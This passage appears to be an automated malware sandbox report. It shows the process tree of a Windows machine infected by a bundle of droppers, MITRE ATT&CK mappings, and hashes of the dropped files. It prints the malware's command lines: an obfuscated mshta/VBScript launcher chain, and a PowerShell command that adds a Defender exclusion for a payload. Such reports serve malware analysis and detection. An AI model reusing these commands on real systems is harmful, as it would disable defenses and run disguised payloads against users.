"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\OoScmPnqaSJ4nQu3EkimNnhV.exe" ) do taskkill -f -iM "%~NxA"
6⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
7⤵
PID:4800

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
8⤵
PID:7408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
9⤵
PID:8068

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
8⤵
PID:7180

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "OoScmPnqaSJ4nQu3EkimNnhV.exe"
7⤵
- Kills process with taskkill
PID:4308

C:\Users\Admin\Documents\3FjEA9S3aOgqhpb3JRwxTB7p.exe
"C:\Users\Admin\Documents\3FjEA9S3aOgqhpb3JRwxTB7p.exe"
4⤵
PID:7184

C:\Users\Admin\Documents\K1UhuwelR5zsR23rjm0SbcjW.exe
"C:\Users\Admin\Documents\K1UhuwelR5zsR23rjm0SbcjW.exe"
4⤵
PID:7264

C:\Users\Admin\Documents\cGYPBkJunBVlOdHDKAM1Ydac.exe
"C:\Users\Admin\Documents\cGYPBkJunBVlOdHDKAM1Ydac.exe"
4⤵
PID:7308

C:\Users\Admin\Documents\cGYPBkJunBVlOdHDKAM1Ydac.exe
C:\Users\Admin\Documents\cGYPBkJunBVlOdHDKAM1Ydac.exe
5⤵
PID:7960

C:\Users\Admin\Documents\0PoztOmRpuQ3nlqcNbh7zUbb.exe
"C:\Users\Admin\Documents\0PoztOmRpuQ3nlqcNbh7zUbb.exe"
4⤵
PID:6440

C:\Users\Admin\Documents\cC3f7EON9WKMJPgnStrdPEb2.exe
"C:\Users\Admin\Documents\cC3f7EON9WKMJPgnStrdPEb2.exe"
4⤵
PID:7532

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
3⤵
PID:6128

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
4⤵
PID:5440

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
3⤵
PID:6076

C:\Users\Admin\AppData\Roaming\8905301.exe
"C:\Users\Admin\AppData\Roaming\8905301.exe"
4⤵
PID:5720

C:\Users\Admin\AppData\Roaming\2606558.exe
"C:\Users\Admin\AppData\Roaming\2606558.exe"
4⤵
PID:4444

C:\Users\Admin\AppData\Roaming\4586746.exe
"C:\Users\Admin\AppData\Roaming\4586746.exe"
4⤵
PID:4904

C:\Users\Admin\AppData\Roaming\5869292.exe
"C:\Users\Admin\AppData\Roaming\5869292.exe"
4⤵
PID:2124

C:\Users\Admin\AppData\Roaming\1158443.exe
"C:\Users\Admin\AppData\Roaming\1158443.exe"
4⤵
PID:4512

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
3⤵
PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 480
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976

C:\Users\Admin\AppData\Local\Temp\is-GRS5P.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GRS5P.tmp\MediaBurner2.tmp" /SL5="$103B4,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
1⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\is-64PJK.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-64PJK.tmp\3377047_logo_media.exe" /S /UID=burnerch2
2⤵
PID:5264

C:\Program Files\Windows Security\JZJDOFLLJC\ultramediaburner.exe
"C:\Program Files\Windows Security\JZJDOFLLJC\ultramediaburner.exe" /VERYSILENT
3⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\is-ECRCF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ECRCF.tmp\ultramediaburner.tmp" /SL5="$4030E,281924,62464,C:\Program Files\Windows Security\JZJDOFLLJC\ultramediaburner.exe" /VERYSILENT
4⤵
PID:2732

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
5⤵
PID:7976

C:\Users\Admin\AppData\Local\Temp\5e-922f8-37d-a72b5-c326f4cbb834d\Docolykeqi.exe
"C:\Users\Admin\AppData\Local\Temp\5e-922f8-37d-a72b5-c326f4cbb834d\Docolykeqi.exe"
3⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\b1-c809c-720-dc984-3b727149bf91f\Locevylyti.exe
"C:\Users\Admin\AppData\Local\Temp\b1-c809c-720-dc984-3b727149bf91f\Locevylyti.exe"
3⤵
PID:6876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\byckpe3u.zjy\GcleanerEU.exe /eufive & exit
4⤵
PID:8284

C:\Users\Admin\AppData\Local\Temp\byckpe3u.zjy\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\byckpe3u.zjy\GcleanerEU.exe /eufive
5⤵
PID:4716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wemxucae.gfj\installer.exe /qn CAMPAIGN="654" & exit
4⤵
PID:8768

C:\Users\Admin\AppData\Local\Temp\wemxucae.gfj\installer.exe
C:\Users\Admin\AppData\Local\Temp\wemxucae.gfj\installer.exe /qn CAMPAIGN="654"
5⤵
PID:8456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dchjkfgd.otx\ufgaa.exe & exit
4⤵
PID:8788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5i5s5oc.20a\anyname.exe & exit
4⤵
- Loads dropped DLL
PID:3756

C:\Users\Admin\AppData\Local\Temp\m5i5s5oc.20a\anyname.exe
C:\Users\Admin\AppData\Local\Temp\m5i5s5oc.20a\anyname.exe
5⤵
PID:9332

C:\Users\Admin\AppData\Local\Temp\m5i5s5oc.20a\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\m5i5s5oc.20a\anyname.exe" -q
6⤵
PID:9804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y115smoc.afi\gcleaner.exe /mixfive & exit
4⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\y115smoc.afi\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\y115smoc.afi\gcleaner.exe /mixfive
5⤵
PID:9488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vlsvr2jo.zg5\autosubplayer.exe /S & exit
4⤵
PID:9840

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3640

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:4372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\is-C32CL.tmp\0PoztOmRpuQ3nlqcNbh7zUbb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C32CL.tmp\0PoztOmRpuQ3nlqcNbh7zUbb.tmp" /SL5="$204A0,138429,56832,C:\Users\Admin\Documents\0PoztOmRpuQ3nlqcNbh7zUbb.exe"
1⤵
PID:3696

C:\Users\Admin\AppData\Local\Temp\is-944KH.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-944KH.tmp\Setup.exe" /Verysilent
2⤵
PID:4996

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
3⤵
PID:692

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629405739 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
4⤵
PID:8740

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Executes dropped EXE
PID:4604

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 38B17AFD028ECBD7A2BE2FC75DAD1689 C
2⤵
PID:2108

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F4262DEDAA9F50884895849D8FDEBA8C
2⤵
PID:6020

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 893D0137132B849691F0FA0961105179 C
2⤵
PID:7328

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A25ED2647C2681ED14703B05A3C195D6 C
2⤵
PID:8516

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7712

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:5576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8552

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9036

C:\Users\Admin\AppData\Local\Temp\D922.exe
C:\Users\Admin\AppData\Local\Temp\D922.exe
1⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\F8E0.exe
C:\Users\Admin\AppData\Local\Temp\F8E0.exe
1⤵
PID:6704

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8700

C:\Users\Admin\AppData\Local\Temp\4D3B.exe
C:\Users\Admin\AppData\Local\Temp\4D3B.exe
1⤵
PID:644

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8428

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:9472

C:\Users\Admin\AppData\Local\Temp\87A5.exe
C:\Users\Admin\AppData\Local\Temp\87A5.exe
1⤵
PID:5268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9364

C:\Users\Admin\AppData\Local\Temp\B916.exe
C:\Users\Admin\AppData\Local\Temp\B916.exe
1⤵
PID:5960

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9604

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7e23e957-0488-4e46-a7ae-44616a09b24c}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:8708

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"
2⤵
PID:9812

C:\Users\Admin\AppData\Local\Temp\E3F0.exe
C:\Users\Admin\AppData\Local\Temp\E3F0.exe
1⤵
PID:10204

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4616

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:9624

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:10116

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9568

C:\Users\Admin\AppData\Local\Temp\47BC.exe
C:\Users\Admin\AppData\Local\Temp\47BC.exe
1⤵
PID:7176

C:\Users\Admin\AppData\Local\Temp\2f8bba4d-5723-4746-a932-79ee768f73b6\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\2f8bba4d-5723-4746-a932-79ee768f73b6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2f8bba4d-5723-4746-a932-79ee768f73b6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2⤵
PID:9192

C:\Users\Admin\AppData\Local\Temp\2f8bba4d-5723-4746-a932-79ee768f73b6\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\2f8bba4d-5723-4746-a932-79ee768f73b6\AdvancedRun.exe" /SpecialRun 4101d8 9192
3⤵
PID:4008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\47BC.exe" -Force
2⤵
PID:8152

C:\Users\Admin\AppData\Local\Temp\47BC.exe
C:\Users\Admin\AppData\Local\Temp\47BC.exe
2⤵
PID:4716

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8900

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:3876

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:4788

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6984

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:7648

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3264

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5600

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9124

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x420
1⤵
PID:6284

C:\Users\Admin\AppData\Roaming\fudugsg
C:\Users\Admin\AppData\Roaming\fudugsg
1⤵
PID:1028

C:\Users\Admin\AppData\Roaming\fudugsg
C:\Users\Admin\AppData\Roaming\fudugsg
2⤵
PID:6044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6000

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8748

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:7088

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6836

C:\Users\Admin\AppData\Roaming\fudugsg
C:\Users\Admin\AppData\Roaming\fudugsg
1⤵
PID:6452

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5724

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4572

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3956

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Company\NewProduct\customer3.exe
MD5
9499dac59e041d057327078ccada8329

SHA1
707088977b09835d2407f91f4f6dbe4a4c8f2fff

SHA256
ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

SHA512
9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

Download Submit
C:\Program Files (x86)\Company\NewProduct\customer3.exe
MD5
9499dac59e041d057327078ccada8329

SHA1
707088977b09835d2407f91f4f6dbe4a4c8f2fff

SHA256
ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

SHA512
9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

Download Submit
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
MD5
aed57d50123897b0012c35ef5dec4184

SHA1
568571b12ca44a585df589dc810bf53adf5e8050

SHA256
096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

SHA512
ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

Download Submit
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
MD5
aed57d50123897b0012c35ef5dec4184

SHA1
568571b12ca44a585df589dc810bf53adf5e8050

SHA256
096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

SHA512
ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

Download Submit
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
MD5
a3ec5ee946f7b93287ba9cf7facc6647

SHA1
3595b700f8e41d45d8a8d15b42cd00cc19922647

SHA256
5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

SHA512
63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

Download Submit
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
MD5
a3ec5ee946f7b93287ba9cf7facc6647

SHA1
3595b700f8e41d45d8a8d15b42cd00cc19922647

SHA256
5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

SHA512
63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SRLPN.tmp\VU1EDKbEK8gfqyvnCHOs4E4z.tmp
MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
MD5
a8c2f6692cd5ade7188949759338b933

SHA1
6e4004ace3b00c21e6c08b5e6acfb2f2f72064e3

SHA256
7034d217bb692dee49bc98cbb69efed359e243c4e7f667819a4a8a82a9625784

SHA512
8c476b68c6593107249065e9a9ee6d3a1b1217a6e3476e0fc9ad22382f1a387ee3cb3d13000ec6a15d0343af17d673b9362260077f6464f10e88bc4c1de3965e

Download Submit
C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe
MD5
a8c2f6692cd5ade7188949759338b933

SHA1
6e4004ace3b00c21e6c08b5e6acfb2f2f72064e3

SHA256
7034d217bb692dee49bc98cbb69efed359e243c4e7f667819a4a8a82a9625784

SHA512
8c476b68c6593107249065e9a9ee6d3a1b1217a6e3476e0fc9ad22382f1a387ee3cb3d13000ec6a15d0343af17d673b9362260077f6464f10e88bc4c1de3965e

Download Submit
C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe
MD5
ec3921304077e2ac56d2f5060adab3d5

SHA1
923cf378ec34c6d660f88c7916c083bedb9378aa

SHA256
b8f88d0b48fbf8c1eac3d72272ddc48c723cbf8ba0527fdf42ad20cc5724ab9f

SHA512
3796aab3dd9822ba41b57ef009166e4f99adab87cf279f9d86d4d7f227128da8faf2da7290e84ebffc11f1e8d17dfd0d8db9c2691e7fc08a93a02f748e293d28

Download Submit
C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe
MD5
ec3921304077e2ac56d2f5060adab3d5

SHA1
923cf378ec34c6d660f88c7916c083bedb9378aa

SHA256
b8f88d0b48fbf8c1eac3d72272ddc48c723cbf8ba0527fdf42ad20cc5724ab9f

SHA512
3796aab3dd9822ba41b57ef009166e4f99adab87cf279f9d86d4d7f227128da8faf2da7290e84ebffc11f1e8d17dfd0d8db9c2691e7fc08a93a02f748e293d28

Download Submit
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe
MD5
a18f404bd61a4168a4693b1a76ffa81f

SHA1
021faa4316071e2db309658d2607779e911d1be7

SHA256
403b1b1f0aca4695f9826afccbff72c3463f47fe9dd72daf74250dab62f52d0e

SHA512
47f58cd69e3cb7042b94ef0205fda6d8aa0f3e7d8358f09c7b1797f6c17c38dc839d01bb6ee7bedaeb4d1953da955433a6dbdcaffbc85f0c5a23509865ee2d4b

Download Submit
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe
MD5
a18f404bd61a4168a4693b1a76ffa81f

SHA1
021faa4316071e2db309658d2607779e911d1be7
